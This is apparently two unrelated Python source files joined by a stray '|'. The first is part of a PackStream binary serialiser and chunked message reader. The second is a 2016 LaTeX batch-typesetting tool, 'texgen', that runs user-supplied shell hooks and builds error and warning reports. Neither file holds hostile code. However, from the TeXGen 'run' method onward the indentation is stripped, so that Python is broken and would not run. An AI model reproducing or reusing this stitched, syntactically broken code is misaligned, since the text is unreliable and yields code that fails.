        signature, then each field packed in order.  Structures are limited
        to 15 fields.

        :raises ValueError: if the signature is not a single byte
        :raises OverflowError: if there are 16 or more fields
        """
        if len(signature) != 1 or not isinstance(signature, bytes):
            raise ValueError("Structure signature must be a single byte value")
        write = self._write
        size = len(fields)
        if size >= 0x10:
            raise OverflowError("Structure size out of range")
        write(PACKED_UINT_8[0xB0 + size])  # TINY_STRUCT marker
        write(signature)
        for field in fields:
            self._pack(field)

    def pack_end_of_stream(self):
        """ Write the terminator for a streamed list or map. """
        self._write(b"\xDF")
class Unpacker:
    """ Deserialises PackStream bytes from an unpackable buffer back into
    Python values.  The buffer must provide read(n), read_u8() and reset();
    read(n) is expected to return a memoryview (see the .tobytes() calls
    below) -- TODO confirm against UnpackableBuffer.
    """
    def __init__(self, unpackable):
        self.unpackable = unpackable
    def reset(self):
        """ Reset the underlying buffer. """
        self.unpackable.reset()
    def read(self, n=1):
        """ Read the next *n* bytes from the buffer. """
        return self.unpackable.read(n)
    def read_u8(self):
        """ Read one byte as an unsigned int, or -1 when exhausted. """
        return self.unpackable.read_u8()
    def unpack(self):
        """ Unpack and return the next complete value. """
        return self._unpack()
    def _unpack(self):
        # Read one marker byte and dispatch on it; compound types recurse.
        marker = self.read_u8()
        if marker == -1:
            raise ValueError("Nothing to unpack")
        # Tiny Integer
        if 0x00 <= marker <= 0x7F:
            return marker
        elif 0xF0 <= marker <= 0xFF:
            # markers 0xF0-0xFF encode the small negatives -16..-1
            return marker - 0x100
        # Null
        elif marker == 0xC0:
            return None
        # Float
        elif marker == 0xC1:
            value, = struct_unpack(">d", self.read(8))
            return value
        # Boolean
        elif marker == 0xC2:
            return False
        elif marker == 0xC3:
            return True
        # Integer
        elif marker == 0xC8:
            return struct_unpack(">b", self.read(1))[0]
        elif marker == 0xC9:
            return struct_unpack(">h", self.read(2))[0]
        elif marker == 0xCA:
            return struct_unpack(">i", self.read(4))[0]
        elif marker == 0xCB:
            return struct_unpack(">q", self.read(8))[0]
        # Bytes
        elif marker == 0xCC:
            size, = struct_unpack(">B", self.read(1))
            return self.read(size).tobytes()
        elif marker == 0xCD:
            size, = struct_unpack(">H", self.read(2))
            return self.read(size).tobytes()
        elif marker == 0xCE:
            size, = struct_unpack(">I", self.read(4))
            return self.read(size).tobytes()
        else:
            # Remaining types encode their category in the high nibble.
            marker_high = marker & 0xF0
            # String
            if marker_high == 0x80: # TINY_STRING
                return decode(self.read(marker & 0x0F), "utf-8")
            elif marker == 0xD0: # STRING_8:
                size, = struct_unpack(">B", self.read(1))
                return decode(self.read(size), "utf-8")
            elif marker == 0xD1: # STRING_16:
                size, = struct_unpack(">H", self.read(2))
                return decode(self.read(size), "utf-8")
            elif marker == 0xD2: # STRING_32:
                size, = struct_unpack(">I", self.read(4))
                return decode(self.read(size), "utf-8")
            # List
            elif 0x90 <= marker <= 0x9F or 0xD4 <= marker <= 0xD7:
                return list(self._unpack_list_items(marker))
            # Map
            elif 0xA0 <= marker <= 0xAF or 0xD8 <= marker <= 0xDB:
                return self._unpack_map(marker)
            # Structure
            elif 0xB0 <= marker <= 0xBF:
                size, tag = self._unpack_structure_header(marker)
                # Pre-size the structure, then fill fields in order.
                value = Structure(tag, *([None] * size))
                for i in range(len(value)):
                    value[i] = self._unpack()
                return value
            elif marker == 0xDF: # END_OF_STREAM:
                return EndOfStream
            else:
                raise ValueError("Unknown PackStream marker %02X" % marker)
    def _unpack_list_items(self, marker):
        """ Generator yielding each element of a list whose header byte was
        *marker*; handles tiny, sized and streamed list encodings.
        """
        marker_high = marker & 0xF0
        if marker_high == 0x90:
            # TINY_LIST: size lives in the low nibble of the marker.
            size = marker & 0x0F
            if size == 0:
                return
            elif size == 1:
                yield self._unpack()
            else:
                for _ in range(size):
                    yield self._unpack()
        elif marker == 0xD4: # LIST_8:
            size, = struct_unpack(">B", self.read(1))
            for _ in range(size):
                yield self._unpack()
        elif marker == 0xD5: # LIST_16:
            size, = struct_unpack(">H", self.read(2))
            for _ in range(size):
                yield self._unpack()
        elif marker == 0xD6: # LIST_32:
            size, = struct_unpack(">I", self.read(4))
            for _ in range(size):
                yield self._unpack()
        elif marker == 0xD7: # LIST_STREAM:
            # Yield items until the EndOfStream sentinel is decoded.
            item = None
            while item is not EndOfStream:
                item = self._unpack()
                if item is not EndOfStream:
                    yield item
        else:
            return
    def unpack_map(self):
        """ Read a marker byte and unpack the map that follows it. """
        marker = self.read_u8()
        return self._unpack_map(marker)
    def _unpack_map(self, marker):
        """ Unpack a map whose header byte was *marker*; returns a dict, or
        None if the marker is not a map marker.
        """
        marker_high = marker & 0xF0
        if marker_high == 0xA0:
            # TINY_MAP: size lives in the low nibble of the marker.
            size = marker & 0x0F
            value = {}
            for _ in range(size):
                key = self._unpack()
                value[key] = self._unpack()
            return value
        elif marker == 0xD8: # MAP_8:
            size, = struct_unpack(">B", self.read(1))
            value = {}
            for _ in range(size):
                key = self._unpack()
                value[key] = self._unpack()
            return value
        elif marker == 0xD9: # MAP_16:
            size, = struct_unpack(">H", self.read(2))
            value = {}
            for _ in range(size):
                key = self._unpack()
                value[key] = self._unpack()
            return value
        elif marker == 0xDA: # MAP_32:
            size, = struct_unpack(">I", self.read(4))
            value = {}
            for _ in range(size):
                key = self._unpack()
                value[key] = self._unpack()
            return value
        elif marker == 0xDB: # MAP_STREAM:
            # Consume key/value pairs until EndOfStream appears as a key.
            value = {}
            key = None
            while key is not EndOfStream:
                key = self._unpack()
                if key is not EndOfStream:
                    value[key] = self._unpack()
            return value
        else:
            return None
    def unpack_structure_header(self):
        """ Read a marker byte and return (size, signature) for the
        structure it introduces, or (None, None) if the buffer is exhausted.
        """
        marker = self.read_u8()
        if marker == -1:
            return None, None
        else:
            return self._unpack_structure_header(marker)
    def _unpack_structure_header(self, marker):
        marker_high = marker & 0xF0
        if marker_high == 0xB0: # TINY_STRUCT
            # Field count is the low nibble; the next byte is the signature.
            signature = self.read(1).tobytes()
            return marker & 0x0F, signature
        else:
            raise ValueError("Expected structure, found marker %02X" % marker)
class UnpackableBuffer:
    """ A growable byte buffer with a read pointer, fed either from initial
    data or from a socket via receive().  `used` marks the extent of valid
    data; `p` is the current read position.
    """

    initial_capacity = 8192

    def __init__(self, data=None):
        preloaded = data is not None
        if preloaded:
            self.data = bytearray(data)
        else:
            self.data = bytearray(self.initial_capacity)
        self.used = len(self.data) if preloaded else 0
        self.p = 0

    def reset(self):
        """ Discard all buffered data and rewind the read pointer. """
        self.used = 0
        self.p = 0

    def read(self, n=1):
        """ Return the next *n* bytes as a zero-copy memoryview slice and
        advance the read pointer past them.
        """
        start = self.p
        self.p = start + n
        return memoryview(self.data)[start:self.p]

    def read_u8(self):
        """ Return the next byte as an unsigned int, or -1 when no unread
        data remains.
        """
        if self.p >= self.used:
            return -1
        value = self.data[self.p]
        self.p += 1
        return value

    def pop_u16(self):
        """ Remove the last two bytes of data, returning them as a big-endian
        16-bit unsigned integer.
        """
        if self.used < 2:
            return -1
        hi = self.data[self.used - 2]
        lo = self.data[self.used - 1]
        self.used -= 2
        return (hi << 8) | lo

    def receive(self, sock, n_bytes):
        """ Append exactly *n_bytes* from the socket, growing the backing
        array as needed; raises OSError if the peer closes early.
        """
        target = self.used + n_bytes
        shortfall = target - len(self.data)
        if shortfall > 0:
            self.data += bytearray(shortfall)
        view = memoryview(self.data)
        while self.used < target:
            received = sock.recv_into(view[self.used:target], target - self.used)
            if received == 0:
                raise OSError("No data")
            self.used += received
class PackStream:
    """ Asynchronous chunked message reader/writer for PackStream
    messaging.  Each message is a sequence of chunks, each prefixed by a
    two-byte big-endian size, terminated by a zero-size chunk.
    """

    # Largest payload per chunk; chunk size headers are 16-bit.
    MAX_CHUNK_SIZE = 0xFFFF

    def __init__(self, reader, writer):
        self._reader = reader
        self._writer = writer

    async def read_message(self):
        """ Read a chunked message.

        Chunks are concatenated until the zero-size terminator chunk, then
        the whole payload is unpacked as a single value.

        :return: the unpacked message value
        """
        data = []
        more = True
        while more:
            chunk_header = await self._reader.readexactly(2)
            chunk_size, = struct_unpack(">H", chunk_header)
            if chunk_size:
                chunk_data = await self._reader.readexactly(chunk_size)
                data.append(chunk_data)
            else:
                # Zero-size chunk marks the end of the message.
                more = False
        buffer = UnpackableBuffer(b"".join(data))
        unpacker = Unpacker(buffer)
        return unpacker.unpack()

    def write_message(self, message):
        """ Write a chunked message.

        The packed payload is split into chunks of at most MAX_CHUNK_SIZE
        bytes (the previous single-chunk header crashed with ValueError for
        payloads of 0x10000 bytes or more), each preceded by a two-byte
        big-endian size header, and terminated by a zero-size chunk.

        :param message: Structure instance to send
        :return:
        """
        if not isinstance(message, Structure):
            raise TypeError("Message must be a Structure instance")
        b = BytesIO()
        packer = Packer(b)
        packer.pack(message)
        data = b.getvalue()
        for offset in range(0, len(data), self.MAX_CHUNK_SIZE):
            chunk = data[offset:offset + self.MAX_CHUNK_SIZE]
            self._writer.write(struct_pack(">H", len(chunk)) + chunk)
        self._writer.write(b"\x00\x00")  # end-of-message marker

    async def drain(self):
        """ Flush the writer.

        :return:
        """
        await self._writer.drain()

    async def close(self):
        """ Close.

        :return:
        """
        self._writer.write_eof()
        self._writer.close()
        await self._writer.wait_closed()  # TODO: fix for < Python 3.7
|
|
#!/usr/bin/env python3
# Created by Jonathan Komar
# 2016-09
# Description:
# Enterprise solution for automated documentation generation.
#
import threading
import queue
import time
import subprocess
import os
import shutil
import sys
import logging,logging.handlers
import re
import getpass
import configparser
import signal
import argparse
app_name = 'texgen'
# Create main (root) logging object, named after this script file
logger = logging.getLogger('{}'.format(__file__))
# Log messages (lowest to highest: DEBUG,INFO,WARN,ERROR,CRITICAL)
logger.setLevel(logging.DEBUG)
# Create console handler that writes logs to terminal early in process
consoleh = logging.StreamHandler(sys.stdout)
# Set Log message level (lowest to highest: DEBUG,INFO,WARN,ERROR,CRITICAL)
consoleh.setLevel(logging.INFO)# default set again in setLogs()
# Define Formats (file format is plain; console format adds ANSI colours)
formatter_file = logging.Formatter('%(asctime)s %(name)s PID: %(process)d TID: %(thread)d %(levelname)s \n ==> %(message)s',datefmt='%Y-%m-%d at %H:%M:%S.%s')# NOTE(review): '%s' in datefmt is platform-specific strftime - confirm intent
formatter_console = logging.Formatter('\033[0;94m%(asctime)s\033[0m \033[32m%(name)s\033[0m PID: \033[0;32m%(process)d\033[0m TID: \033[0;32m%(thread)d\033[0m %(levelname)s \n \033[0m==>\033[0m\033[1;31m %(message)s\033[1;0m',datefmt='%Y-%m-%d at %H:%M:%S')
# Tell console handler to use this format
consoleh.setFormatter(formatter_console)
# Add Log Handler Objects to the Local Root Logger
logger.addHandler(consoleh)
class TeXGen(): # Class containing methods separate from threader class
	def __init__(self,arg_struct):
		# arg_struct: namespace of parsed CLI options, shared across the app
		self.arg_pack = arg_struct
		self.thread_pool = []	# worker threads, populated while running
		self.run()	# NOTE: constructor immediately executes the whole workflow
def run(self):
self.argCheck()# Do this early on e.g. output check
if self.arg_pack.daemon == True:
logger.debug('Daemon Mode: {}.'.format(self.arg_pack.daemon))
self.goDaemon()
else: # Oneshot Mode
logger.debug('Daemon Mode: {}.'.format(self.arg_pack.daemon))
self.goOneShot()
class SignalHandler:
def __init__(self, arg_pack, thread_pool):
self.arg_pack = arg_pack
self.thread_pool = thread_pool # not in arg_pack, set by TeXGen obj later
def __call__(self, signum, frame):# implicitly run when object called, obj then requires 2 args
logger.info('\nSignalHandler Received SIGINT. Stopping all threads ASAP!')
self.arg_pack.stop_flag.set()
# for job in self.arg_pack.tex_queue:
# logger.info('SignalHandler: Detected stopflag. Removing {} from the Queue.'.format(job))
# job.task_done()# force empty queue to unblock join
# logger.debug('SignalHandler: Queue is empty: {}'.format(self.arg_pack.tex_queue.empty()))
for thread in self.thread_pool: # loop thru all threads
if thread.isAlive(): # redundant check. alive threads rejoin in run method of TypesetThread at while self.arg_pack.stop_flag.isSet() == False
logger.info('SignalHandler: Detected stopflag. Rejoining {} to the main thread.'.format(thread))
thread.join()# join thread (should not exist due to while loop)
else: # most likely the case
logger.info('SignalHandler: Detected stopflag. Removing {} from the thread pool.'.format(thread))
self.arg_pack.exitcode = 1
def argCheck(self):
if self.arg_pack.output != None:
if not os.path.isdir(self.arg_pack.output):
logger.warning('argCheck: Missing output -o directory: "{}"'.format(self.arg_pack.output))
self.arg_pack.exitcode = 1
else:
self.arg_pack.output = os.path.abspath(self.arg_pack.output)
def goOneShot(self):
logger.debug('goOneShot called.')
tex_input_list = [] # init (arg_pack.input contains either dirs or files, but this list must contain only files)
logger.debug('goOneShot: Recursive check: {}\n Depth: {}'.format(self.arg_pack.recursive,self.arg_pack.depth))
if self.arg_pack.input != None: # should have a dir or file, otherwise help is shown by argparse
if self.arg_pack.recursive is True:# First decide how to make tex_input_list, recursive, then dirs.
for item in self.arg_pack.input:
if os.path.isdir(item):# ensure item is a dir
tex_input_list = self.getFilesRecursively('.*\.tex',item,self.arg_pack.depth[0])
else:
logger.warning('goOneShot: Input with recursion -r must be a directory: "%s"'% (item))
else: # input is a list of files
tex_input_list = self.arg_pack.input
logger.debug('goOneShot: tex_input_list: {}'.format(tex_input_list))
for file in tex_input_list:
if not os.path.isfile(file): # File check
logger.error('goOneShot: File not found: "%s"' % (file))
self.arg_pack.exitcode = 1
return
else:
logger.debug('goOneShot: Found file: %s' % file)
logger.info('Files to process: %s' % (tex_input_list))
else: # no input given
self.arg_pack.exitcode = 1
logger.warning('goOneShot: No files to process.')
return
for tex_file in tex_input_list:
if not os.path.isfile(tex_file): # redundant file check
logger.error('goOneShot: TeX file does not exist: {}'.format(tex_file))
self.arg_pack.exitcode = 1
return
else: # populate tex queue
self.arg_pack.tex_queue.put(tex_file)
# Start the business
if self.arg_pack.iterations[0] > 0:
if self.arg_pack.prehook != None:
self.preHook() # Inject hook
#self.preProcess() # Disabled for the time being. Orig purpose was to grab svn/git repos
signal_handler = self.SignalHandler(self.arg_pack,self.thread_pool)# create signal handler, needs stop_flag,thread_pool
signal.signal(signal.SIGINT, signal_handler)# Connect SIGINT to signal_handler
logger.info('Starting main typesetting phase.')
self.runThreads()
logger.info('Starting postprocessing phase.')
self.postProcess()
if self.arg_pack.posthook != None:
self.postHook() # Inject hook
else:
logger.info("goOneShot: {} iterations, therefore nothing to do".format(self.arg_pack.iterations[0]))
def runThreads(self): # uses self.thread_pool to group of threads. Uses to self.arg_pack.thread_limit know how many thread objects to make
logger.debug('runThreads called.')
#logger.debug('runThreads: thread limit: {}'.format(self.arg_pack.thread_limit[0]))
for item in range(self.arg_pack.thread_limit[0]): # Create as many threads objects as allowed by limit
self.thread_pool.append(TypesetThread(self.arg_pack))# Pass entire arg_pack including tex_queue and stop_flag
logger.info('Thread Pool:\n {}'.format(self.thread_pool))
for i,thread in enumerate(self.thread_pool):# Start threads
logger.debug('runThreads: Starting thread {}:\n {}'.format(i+1,thread))
thread.start()
self.arg_pack.tex_queue.join()# join on Queue object blocks until all items in queue have been fetched and processes i.e. queue is empty. use this to wait before running join loop on thread list.
for i,thread in enumerate(self.thread_pool): # loops number of thread objects
logger.info('runThreads: Joining thread object: {}'.format(thread))
thread.join()# Join thread one by one (None is special)
del self.thread_pool[:] # Empty thread pool list at end of every runThreads call to ensure threads are only started once.
def goDaemon(self):
logger.info('goDaemon called.')
logger.warning('Daemon mode -d has not yet been implemented.')
self.arg_pack.exitcode = 1
def cpFilesToOutput(self):# Stupid mover for lists of files
logger.debug('cpFilesToOutput called.')
clone_list = []
if os.path.isdir(self.arg_pack.output):# First check destination
if self.arg_pack.clean == True:
logger.info('cpFilesToOutput: Clean parameter true. Deleting all files in output directory:\n {}'.format(self.arg_pack.output))
for base,dirs,files in os.walk(self.arg_pack.output, topdown=False):
for file_name in files:
logger.debug('cpFilesToOutput: Removing:\n {}'.format(os.path.join(base,file_name)))
os.remove(os.path.join(base,file_name))
for dir_name in dirs:
logger.debug('cpFilesToOutput: Removing:\n {}'.format(os.path.join(base,dir_name)))
os.rmdir(os.path.join(base,dir_name))
self.arg_pack.completed_queue.put('Sentinel')# Use to force stop iteration of queue
for item_tuple in iter(self.arg_pack.completed_queue.get, 'Sentinel'):# Stop when get yields None
logger.debug('cpFilesToOutput: Temporarily removing from self.arg_pack.completed_queue: {}'.format(item_tuple))
clone_list.append(item_tuple)
item = item_tuple[0]# conv to string
logger.debug('cpFilesToOutput: Processing item: {}'.format(item))
if os.path.isfile(item):# Second check file
if item.endswith('.log') and self.arg_pack.movelogs == False:
logger.debug('cpFilesToOutput: Skipping log: {}'.format(item))
else:
logger.info('Copying "{}" to "{}"'.format(item,self.arg_pack.output))
shutil.copy(item,self.arg_pack.output)
else:
logger.warning('cpFilesToOutput: Could not copy, file not found:\n {}'.format(item))
for item in clone_list:
logger.debug('cpFilesToOutput: Restoring to self.arg_pack.completed_queue: {}'.format(item))
self.arg_pack.completed_queue.put(item)
else:
logger.error('cpFilesToOutput: Destination not found:\n {}'.format(self.arg_pack.output))
def getFilesRecursively(self,regex,base_dir_input='os.path.dirname(os.path.realpath(__file__))',depth=0):
logger.debug('getFilesRecursively: Recursion depth: %s' % (depth))
results_list = [] # init
regex_obj = re.compile(regex) # make regex object
logger.debug('getFilesRecursively:\n Regular Expression: %s\n Base: "%s"\n Depth: %s' % (regex_obj.pattern,base_dir_input,depth))
if os.path.isdir(base_dir_input):
base_dir_input.rstrip(os.path.sep)# ensure depth counter is accurate by removing extraneous /
base_depth = base_dir_input.count(os.path.sep)# set initial base depth
for base, dirs, files in os.walk(base_dir_input): # Collect all tex files recursively
if depth != 0:
try:
depth = int(depth) # redundant test for integer
except:
logger.warning('getFilesRecursively: depth not an integer: %s' % (depth))
current_depth = base.count(os.path.sep)
if current_depth - base_depth <= depth:
for file in files:
file_name = os.path.basename(os.path.normpath(file))
if re.match(regex_obj,file_name):
logger.debug('Appending to results_list: "%s"' % (os.path.join(base,file)))
results_list.append(os.path.join(base,file))
else:# depth is infinity
logger.debug('getFilesRecursively: Depth is 0 (infinity).')
for file in files:
file_name = os.path.basename(os.path.normpath(file))
if re.match(regex_obj,file_name):
logger.debug('Appending to results_list: "%s"' % (os.path.join(base,file)))
results_list.append(os.path.join(base,file))
logger.debug('Results: %s' % (results_list))
return results_list
else:
logger.warning('getFilesRecursively: Not found: "%s"' % (base_dir_input))
self.arg_pack.exitcode = 1
def preProcess(self):
logger.debug('preProcess started. Nothing to do.')
def postProcess(self): # This groups postprocessing routines
logger.debug('postProcess: Called.')
if self.arg_pack.stop_flag.isSet() == False:
# Check parameters for things to be done after compilation complete
if len(self.arg_pack.error_report) > 0:
if os.path.isfile(self.arg_pack.error_report[0]):
self.genErrorReport()# auto adds tasks to tex_queue
else:
logger.error("postProcess: Error Report regular expressions file not found: {}".format(self.arg_pack.error_report[0]))
if len(self.arg_pack.warning_report) > 0:
if os.path.isfile(self.arg_pack.warning_report[0]):
self.genWarningReport()# auto adds tasks to tex_queue
else:
logger.error("postProcess: Warning Report regular expressions file not found: {}".format(self.arg_pack.warning_report[0]))
logger.debug('postProcess: Setting arg_pack.iterations to 2 for report generation.')
self.arg_pack.iterations = [2]
self.runThreads()
if self.arg_pack.output == None:
logger.debug('postProcess: Not moving anything because no output -o directory has been specified.')
else: # Process the move to output dir
if os.path.isdir(self.arg_pack.output):# Redundant output check
logger.debug('postProcess: Detected: output -o detected: "%s"'% (self.arg_pack.output))
else:
logger.error('postProcess: Output -o not found. Creating directory: {}'.format(self.arg_pack.output))
try:
os.makedirs(self.arg_pack.output)
except:
logger.error('postProcess: Could not create output directory: {}'.format(self.arg_pack.output))
self.arg_pack.exitcode = 1
self.cpFilesToOutput()# No need to send list. All needed info contained in self.arg_pack
def preHook(self):
# Adds possibility to run external script beforehand
logger.debug('preHook called.')
for script in self.arg_pack.prehook:
command = "{}".format(script)
logger.info('preHook Executing with 15 second timeout: \n /bin/sh -c {}'.format(command))
process = subprocess.Popen(command,stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True)# timeout in seconds
process.wait(timeout=15)
proc_stdout, proc_stderr = process.communicate()
if process.returncode == 0:
logger.info('preHook: Process complete: \n Command: /bin/sh -c {}\n STDOUT: "{}"\n STDERR: "{}"\n Exit Code: {}\n at: {}'.format(command,proc_stdout.decode('utf8').strip(),proc_stderr.decode('utf8').strip(),process.returncode,time.time()))
else:
self.arg_pack.exitcode = 1
logger.error('preHook: Process failed: \n Command: /bin/sh -c {}\n STDOUT: "{}"\n STDERR: "{}"\n Exit Code: {}\n at: {}'.format(command,proc_stdout.decode('utf8').strip(), proc_stderr.decode('utf8').strip(),process.returncode,time.time()))
def postHook(self):
# Adds possibility to run external script beforehand
logger.debug('postHook called.')
for script in self.arg_pack.posthook:
command = "{}".format(script)
logger.info('postHook Executing with 15 second timeout: \n /bin/sh -c {}'.format(command))
process = subprocess.Popen(command,stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True)# timeout in seconds
process.wait(timeout=15)
proc_stdout, proc_stderr = process.communicate()
if process.returncode == 0:
logger.info('postHook: Process complete: \n Command: /bin/sh -c {}\n STDOUT: "{}"\n STDERR: "{}"\n Exit Code: {}\n at: {}'.format(command,proc_stdout.decode('utf8').strip(),proc_stderr.decode('utf8').strip(),process.returncode,time.time()))
else:
self.arg_pack.exitcode = 1
logger.error('postHook: Process failed: \n Command: /bin/sh -c {}\n STDOUT: "{}"\n STDERR: "{}"\n Exit Code: {}\n at: {}'.format(command,proc_stdout.decode('utf8').strip(), proc_stderr.decode('utf8').strip(),process.returncode,time.time()))
def genErrorReport(self):
logger.debug('genErrorReport: Called.')
log_list = []
error_list = []# Append to this to add __ErrorReport__ content
completed_queue_clone_list = []#init
failed_list = []#init
failed_queue_clone_list = []#init
self.arg_pack.completed_queue.put('Sentinel')
for item_tuple in iter(self.arg_pack.completed_queue.get,'Sentinel'):# Stop when get yields None
#logger.debug('genErrorReport: Temporarily removing from self.arg_pack.completed_queue: {}'.format(item_tuple))
completed_queue_clone_list.append(item_tuple)# clone for adding back to completed_queue
item = item_tuple[0]# string conversion
logger.debug('genErrorReport processing:\n "{}"'.format(item))
if item.endswith('.log'):
logger.debug('genErrorReport found log: {}'.format(item))
log_list.append(item)
logger.info('genErrorReport found logs: {}'.format(log_list))
for item in completed_queue_clone_list:# restore completed_queue
self.arg_pack.completed_queue.put(item)
self.arg_pack.failed_queue.put('Sentinel')
for item_tuple in iter(self.arg_pack.failed_queue.get,'Sentinel'):
failed_queue_clone_list.append(item_tuple)# clone for adding back to failed_queue
item = item_tuple[0]
failed_list.append(item)
logger.debug('genErrorReport processing failed .tex file:\n "{}"'.format(item))
for item in failed_queue_clone_list:# restore failed_queue
self.arg_pack.failed_queue.put(item)
# Start process failed_list
if len(self.arg_pack.hook_errors) > 0:
if os.path.isfile(self.arg_pack.hook_errors[0]):
error_list.append("\\section{Hook Errors}")
with open(self.arg_pack.hook_errors[0]) as hook_errors_handler:
for line in hook_errors_handler:
error_list.append(line)
if len(failed_list) > 0: # Process failed tex docs
for failed_item in failed_list:# First see whether any docs failed to build
#logger.debug('genErrorReport: Processing failed document: {}'.format(os.path.splitext(failed_item)[0]))#
logger.info('genErrorReport: Processing failed document: {}'.format(failed_item))
# rm failed tex from log_list
logger.debug('genErrorReport: Grabbing log of failed document log from log_list.\n File: {}'.format(failed_item))
failed_item_log = '{}.log'.format(os.path.splitext(failed_item)[0])
failed_item_escaped = self.escapeTexString(os.path.basename(failed_item))
#log_list.remove(failed_item)
# stuff to implement: grab corresponding log from file from log_list
# print failed document + log to __ErrorReport__
error_list.append('\n\\section{%s}\n\\subsection{Typesetting Failure}' % (failed_item_escaped))# Add headings
error_list.append('\n\\begin{treateachletterasword}')
with open(os.path.splitext(failed_item)[0]+'.log') as texlog_handle:
for line in texlog_handle:
line_escaped = self.escapeTexString(line)
error_list.append('\n%s' % (line_escaped.rstrip()))# Add log.
error_list.append('\n\\end{treateachletterasword}')
# End process failed_list
logger.debug('genErrorReport: arg_pack.error_report: {}'.format(self.arg_pack.error_report[0]))
logger.debug('genErrorReport: Using external pattern file.')
error_pattern_handler = open(self.arg_pack.error_report[0],'r')
pattern_list = []# init
for i,line in enumerate(error_pattern_handler):
pattern_list.append(re.compile(line.rstrip()))
logger.info('genErrorReport: Pattern list: {}'.format(pattern_list))
logger.debug('genErrorReport: Log list: {}'.format(log_list))
if len(log_list) > 0: # For both cases, scan logs
for item in log_list:
if not os.path.isfile(item):
logger.error('genErrorReport: File not found: {}'.format(item))
else:
titled_already = False# Item needs section heading
texlog_handle = open(item,'r')
for i,line in enumerate(texlog_handle):
for pattern in pattern_list:
#logger.debug('Searching for pattern: "{}"'.format(pattern.pattern))
for match in re.finditer(pattern,line):
logger.debug('genErrorReport matched: {}'.format(pattern.pattern))
match_found = True
line_escaped = self.escapeTexString(line)
pattern_escaped = self.escapeTexString(pattern.pattern)
if titled_already == False:
file_name_escaped = self.escapeTexString(item)
error_list.append('\n\\section{%s}\n\\subsection{Regular Expression Match}' % (os.path.basename(file_name_escaped)))
titled_already = True
error_list.append('\n\\begin{itemize}\n\\item Log output line %s is: \\begin{treateachletterasword}%s\\end{treateachletterasword} which matches regular expression \\begin{treateachletterasword}%s\\end{treateachletterasword}\n\\end{itemize}' % (i+1, line_escaped,pattern_escaped) + '\n')
texlog_handle.close()
pre_doc = """\\documentclass{article}
\\usepackage{fontspec}
\\newfontfamily\\monofont{FreeMono.otf}
\\usepackage[includeheadfoot,top=3cm,left=2cm,right=2cm,bottom=2cm]{geometry}
\\usepackage{datetime}
\\usepackage[hidelinks]{hyperref}
\\long\\def\\treateachletterasword{%
\\bgroup
\\XeTeXinterchartokenstate=1% Enable Character Classes (unique to xelatex) 0=off 1=on
\\XeTeXinterchartoks 0 0 = {\\penalty0\\relax}% Set token to be inserted between interchar class 0 and interchar class 0
\\monofont% Set monospaced font
\\setlength{\parindent}{0pt}% Remove new paragraph indentation
\\obeylines% \\catcode`\\^^M\\active \\let ^^M\\par
}%
\\def\\endtreateachletterasword{\\egroup}
\\title{Error Report}
\\date{Typeset \\today{} at \\currenttime{}}
\\author{TeXGen System}
\\begin{document}
\\maketitle{}
\\tableofcontents
\\newpage
"""
post_doc = """
\\end{document}"""
if len(error_list) > 0:
self.arg_pack.exitcode = 1 # ErrorReport only. We want exit of 1 when exists.
logger.error('genErrorReport: Typesetting errors detected. Setting exit code to: {}'.format(self.arg_pack.exitcode))
if self.arg_pack.recursive == True:# Input must be directory
base_dir = os.path.abspath(self.arg_pack.input[0])
error_report_dir = os.path.join(base_dir,'__ErrorReport__')
error_report_file = os.path.join(error_report_dir, '__ErrorReport__.tex')
else:# Non-recursive, file list input, currently same as recursive
base_dir = os.path.abspath(os.path.join(self.arg_pack.input[0],os.pardir))
error_report_dir = os.path.join(base_dir,'__ErrorReport__')
error_report_file = os.path.join(error_report_dir, '__ErrorReport__.tex')
if os.path.isdir(error_report_dir) == True:
logger.warning('genErrorReport: "{}" directory already exists. Directory name adjusted using current time for unique name.'.format(error_report_dir))
error_report_dir = error_report_dir + '{}'.format(time.time())
error_report_file = os.path.join(error_report_dir, '__ErrorReport__{}.tex'.format(time.time()))
os.makedirs(error_report_dir)
f1 = open(error_report_file,'w')
f1.write(pre_doc)
for line in error_list:
f1.write(line)
f1.write(post_doc)
f1.close()
self.arg_pack.tex_queue.put(error_report_file)
def genWarningReport(self):
logger.debug('genWarningReport: Called.')
log_list = []
error_list = []
clone_list = []#init
self.arg_pack.completed_queue.put('Sentinel')
for item_tuple in iter(self.arg_pack.completed_queue.get,'Sentinel'):# Stop when get yields None
#logger.debug('genWarningReport: Temporarily removing from self.arg_pack.completed_queue: {}'.format(item_tuple))
clone_list.append(item_tuple)# clone for adding back to completed_queue
item = item_tuple[0]# string conversion
logger.debug('genWarningReport processing:\n "{}"'.format(item))
if item.endswith('.log'):
logger.debug('genWarningReport found log: {}'.format(item))
log_list.append(item)
logger.info('genWarningReport found logs: {}'.format(log_list))
for item in clone_list:
#logger.debug('genWarningReport: Restoring to self.arg_pack.completed_queue: {}'.format(item))
self.arg_pack.completed_queue.put(item)
#if self.arg_pack.error_report:# use default patterns
# pattern_list = [
# re.compile(r'^Invalid UTF-8 byte or sequence.*'),
# re.compile(r'^Overfull .*'),
# re.compile(r'^Underfull .*'),
# re.compile(r'.*Warning:.*'),
# ]
#else:# use external pattern file
logger.debug('Using external pattern file:\n "{}"'.format(self.arg_pack.warning_report[0]))
warning_pattern_handler = open(self.arg_pack.warning_report[0],'r')
pattern_list = []# init
for i,line in enumerate(warning_pattern_handler):
pattern_list.append(re.compile(line.rstrip()))# There are issues at this step.
logger.info('genWarningReport pattern list: {}'.format(pattern_list))
logger.debug('genWarningReport log list: {}'.format(log_list))
if len(log_list) > 0: # For both cases, scan logs
for item in log_list:
if not os.path.isfile(item):
logger.error('genWarningReport: File not found: {}'.format(item))
else:
titled_already = False# Item needs section heading
texlog_handle = open(item,'r')
for i,line in enumerate(texlog_handle):
for pattern in pattern_list:
#logger.debug('genWarningReport: Searching for pattern: "{}"'.format(pattern.pattern))
for match in re.finditer(pattern,line):
logger.debug('genWarningReport: Matched: {}'.format(pattern.pattern))
match_found = True
line_escaped = self.escapeTexString(line)
pattern_escaped = self.escapeTexString(pattern.pattern)
if titled_already == False:
file_name_escaped = self.escapeTexString(item)
error_list.append('\n\\section{%s}\n\\subsection{Regular Expression Match}' % (os.path.basename(file_name_escaped)))
titled_already = True
error_list.append('\n\\begin{itemize}\n\\item Log output line %s is: \\begin{treateachletterasword}%s\\end{treateachletterasword} which matches regular expression \\begin{treateachletterasword}%s\\end{treateachletterasword}\n\\end{itemize}' % (i+1, line_escaped,pattern_escaped) + '\n')
texlog_handle.close()
pre_doc = """\\documentclass{article}
